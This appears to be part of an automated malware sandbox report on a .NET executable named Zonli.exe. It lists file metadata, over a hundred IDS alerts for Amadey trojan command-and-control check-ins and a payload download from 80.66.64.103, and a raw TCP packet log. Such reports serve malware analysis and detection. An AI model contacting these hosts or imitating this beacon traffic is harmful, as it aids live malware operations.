                                                                              RT_MANIFEST0x99400x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain
                                                                              DescriptionData
                                                                              Translation0x0000 0x04b0
                                                                              LegalCopyrightCopyright 2020
                                                                              Assembly Version1.0.0.0
                                                                              InternalNameZonli.exe
                                                                              FileVersion1.0.0.0
                                                                              Comments
                                                                              ProductNameZonli
                                                                              ProductVersion1.0.0.0
                                                                              FileDescriptionZonli
                                                                              OriginalFilenameZonli.exe
                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              192.168.2.480.66.64.10349930802027700 06/02/22-01:55:16.173253TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349838802027700 06/02/22-01:54:35.308940TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349927802027700 06/02/22-01:55:14.996723TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349795802027700 06/02/22-01:54:03.603999TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349847802027700 06/02/22-01:54:40.420240TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349884802027700 06/02/22-01:54:59.033835TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349786802027700 06/02/22-01:53:59.792799TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349856802027700 06/02/22-01:54:48.512198TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349865802027700 06/02/22-01:54:52.313960TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349804802027700 06/02/22-01:54:11.691876TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349875802027700 06/02/22-01:54:56.892898TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349908802027700 06/02/22-01:55:09.504161TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349860802027700 06/02/22-01:54:50.236611TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349902802027700 06/02/22-01:55:07.107382TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349813802027700 06/02/22-01:54:16.846546TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349911802027700 06/02/22-01:55:10.674378TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349857802027700 06/02/22-01:54:48.921276TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349822802027700 06/02/22-01:54:22.723931TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349794802027700 06/02/22-01:54:03.209829TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349898802027700 06/02/22-01:55:05.537740TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349842802027700 06/02/22-01:54:37.470332TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349805802027700 06/02/22-01:54:12.457300TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349917802027700 06/02/22-01:55:13.026841TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349828802027700 06/02/22-01:54:29.678179TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349912802027700 06/02/22-01:55:11.068306TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349894802027700 06/02/22-01:55:03.266530TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349846802027700 06/02/22-01:54:39.535862TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349918802027700 06/02/22-01:55:13.415553TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349823802027700 06/02/22-01:54:23.851395TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349829802027700 06/02/22-01:54:30.271644TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349787802027700 06/02/22-01:54:00.206557TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349899802027700 06/02/22-01:55:05.935550TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349841802027700 06/02/22-01:54:36.841594TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349907802027700 06/02/22-01:55:09.093756TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349809802027700 06/02/22-01:54:14.556780TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349873802027700 06/02/22-01:54:56.035907TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349876802027700 06/02/22-01:54:57.279397TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349904802027700 06/02/22-01:55:07.924426TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349818802027700 06/02/22-01:54:20.253472TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349864802027700 06/02/22-01:54:51.906731TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349870802027700 06/02/22-01:54:54.611013TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349910802027700 06/02/22-01:55:10.281176TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349821802027700 06/02/22-01:54:22.195678TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349815802027700 06/02/22-01:54:18.395076TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349824802027700 06/02/22-01:54:26.976249TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349913802027700 06/02/22-01:55:11.452857TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349840802027700 06/02/22-01:54:36.304157TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349845802027700 06/02/22-01:54:39.016305TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349848802027700 06/02/22-01:54:40.940110TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349797802027700 06/02/22-01:54:07.717713TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349839802027700 06/02/22-01:54:35.815421TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349895802027700 06/02/22-01:55:03.704177TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349928802027700 06/02/22-01:55:15.391348TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349854802027700 06/02/22-01:54:47.429553TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349889802027700 06/02/22-01:55:00.995564TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349851802027700 06/02/22-01:54:43.268560TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349886802027700 06/02/22-01:54:59.808425TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349892802027700 06/02/22-01:55:02.407884TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349802802027700 06/02/22-01:54:10.716390TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349837802027700 06/02/22-01:54:34.756140TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349843802027700 06/02/22-01:54:37.930780TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349915802027700 06/02/22-01:55:12.229808TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349878802027700 06/02/22-01:54:57.842866TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349790802027700 06/02/22-01:54:01.502536TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349862802027700 06/02/22-01:54:51.108372TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349789802027700 06/02/22-01:54:01.077017TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349832802027700 06/02/22-01:54:31.829694TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349867802027700 06/02/22-01:54:53.090905TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349909802027700 06/02/22-01:55:09.894069TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349826802027700 06/02/22-01:54:28.377083TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349784802027700 06/02/22-01:53:58.905731TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349896802027700 06/02/22-01:55:05.115552TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349844802027700 06/02/22-01:54:38.495305TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349798802027700 06/02/22-01:54:08.357862TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349792802027700 06/02/22-01:54:02.409046TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349890802027700 06/02/22-01:55:01.415532TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349820802027700 06/02/22-01:54:21.626939TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349801802027700 06/02/22-01:54:10.166147TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349807802027700 06/02/22-01:54:13.581561TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349881802027700 06/02/22-01:54:58.640328TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349859802027700 06/02/22-01:54:49.805320TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349872802027700 06/02/22-01:54:55.595480TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349868802027700 06/02/22-01:54:53.522171TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349810802027700 06/02/22-01:54:15.300527TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349816802027700 06/02/22-01:54:18.919405TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349863802027700 06/02/22-01:54:51.496357TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349905802027700 06/02/22-01:55:08.307583TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349788802027700 06/02/22-01:54:00.640844TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349929802027700 06/02/22-01:55:15.780137TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349871802027700 06/02/22-01:54:55.173382TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349900802027700 06/02/22-01:55:06.323240TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349834802027700 06/02/22-01:54:32.993751TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349811802027700 06/02/22-01:54:15.765338TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349869802027700 06/02/22-01:54:54.121449TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349817802027700 06/02/22-01:54:19.458105TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349830802027700 06/02/22-01:54:30.708454TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349764802027700 06/02/22-01:53:40.683010TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349793802027700 06/02/22-01:54:02.814058TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349887802027700 06/02/22-01:55:00.209740TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.480.66.64.103
                                                                              80.66.64.103192.168.2.480497642838063 06/02/22-01:53:40.865782TCP2838063ETPRO TROJAN Amadey CnC Server Payload Response (exe)804976480.66.64.103192.168.2.4
                                                                              192.168.2.480.66.64.10349853802027700 06/02/22-01:54:46.902584TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349906802027700 06/02/22-01:55:08.703562TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349800802027700 06/02/22-01:54:09.502750TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349835802027700 06/02/22-01:54:33.554231TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349858802027700 06/02/22-01:54:49.360293TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349901802027700 06/02/22-01:55:06.719832TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349806802027700 06/02/22-01:54:12.991151TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349803802027700 06/02/22-01:54:11.166089TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349812802027700 06/02/22-01:54:16.364540TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349916802027700 06/02/22-01:55:12.621332TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349861802027700 06/02/22-01:54:50.675680TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349852802027700 06/02/22-01:54:46.408172TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349888802027700 06/02/22-01:55:00.609327TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349922802027700 06/02/22-01:55:14.194314TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349799802027700 06/02/22-01:54:08.864611TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349836802027700 06/02/22-01:54:34.112033TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349833802027700 06/02/22-01:54:32.459145TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349827802027700 06/02/22-01:54:28.893296TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349925802027700 06/02/22-01:55:14.580879TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349831802027700 06/02/22-01:54:31.147059TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349919802027700 06/02/22-01:55:13.807547TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349825802027700 06/02/22-01:54:27.778293TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349791802027700 06/02/22-01:54:01.965478TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349785802027700 06/02/22-01:53:59.351850TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349914802027700 06/02/22-01:55:11.848128TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349874802027700 06/02/22-01:54:56.482566TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349866802027700 06/02/22-01:54:52.699550TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349819802027700 06/02/22-01:54:20.991169TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349903802027700 06/02/22-01:55:07.519813TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349880802027700 06/02/22-01:54:58.245914TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349891802027700 06/02/22-01:55:01.891788TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349849802027700 06/02/22-01:54:41.432432TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349796802027700 06/02/22-01:54:04.522416TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349814802027700 06/02/22-01:54:17.528472TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349885802027700 06/02/22-01:54:59.420913TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349855802027700 06/02/22-01:54:48.113243TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349808802027700 06/02/22-01:54:14.080650TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349850802027700 06/02/22-01:54:42.196474TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.480.66.64.103
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jun 2, 2022 01:53:21.461189985 CEST4975880192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.493177891 CEST8049758172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.493300915 CEST4975880192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.494254112 CEST4975880192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.525991917 CEST8049758172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.542336941 CEST8049758172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.596247911 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.596302986 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.596436977 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.632337093 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.632370949 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.639678001 CEST4975880192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.716706991 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.716862917 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.720592022 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:21.720612049 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.720820904 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:21.843034029 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.048537970 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.092518091 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.255666971 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.255748987 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.255805016 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.255832911 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.255858898 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.255876064 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.255913973 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.255969048 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.256006956 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.256021976 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.256045103 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.256103039 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.301507950 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.301624060 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.301692009 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.301702023 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.301740885 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.301798105 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.301809072 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.301824093 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.301876068 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.301888943 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.301964045 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302021027 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302026987 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302047968 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302109003 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302122116 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302186966 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302248001 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302248001 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302265882 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302324057 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302336931 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302432060 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302490950 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302496910 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302515030 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302565098 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302582026 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302699089 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302757025 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302769899 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302845001 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.302898884 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.302911997 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.342852116 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.342889071 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.354722023 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.354798079 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.354831934 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.354860067 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.354923010 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.354937077 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355004072 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355062962 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355066061 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355084896 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355137110 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355169058 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355298042 CEST44349759172.67.152.230192.168.2.4
